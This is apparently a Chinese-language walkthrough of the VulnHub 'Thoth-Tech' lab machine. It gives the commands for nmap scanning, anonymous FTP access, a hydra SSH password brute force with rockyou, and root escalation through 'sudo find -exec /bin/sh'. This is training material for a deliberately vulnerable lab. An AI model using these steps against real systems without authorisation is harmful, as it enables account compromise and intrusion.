下载地址:https://download.vulnhub.com/thothtech/Thoth-Tech.ova
主机发现
arp-scan -l
目标:192.168.21.148
端口扫描
nmap --min-rate 10000 -p- 192.168.21.148
服务扫描
nmap -sV -sT -O -p21,22,80 192.168.21.148
漏洞扫描
nmap --script=vuln -p21,22,80 192.168.21.148
先去看web网站
在f12里面发现
再去看看web的别的
感觉少了点东西于是又扫了一遍
nmap -A 192.168.21.148
发现ftp能匿名登入
去看看(用户名anonymous)
ftp 192.168.21.148
这里告诉我们pwnlab能爆破
hydra -l pwnlab -P /usr/share/wordlists/rockyou.txt ssh://192.168.21.148
ssh登入
ssh pwnlab@192.168.21.148
第一个flag
信息收集
10和11是我执行的发现有find
这里用find找可执行的文件
find / -user root -perm /40000 2>/dev/null
没有东西
再看看sudo
find没有密码要求,那么就需要利用这个来提权了
find 命令提权 - 编程猎人 (programminghunter.com)
sudo find . -exec /bin/sh \; -quit
结束
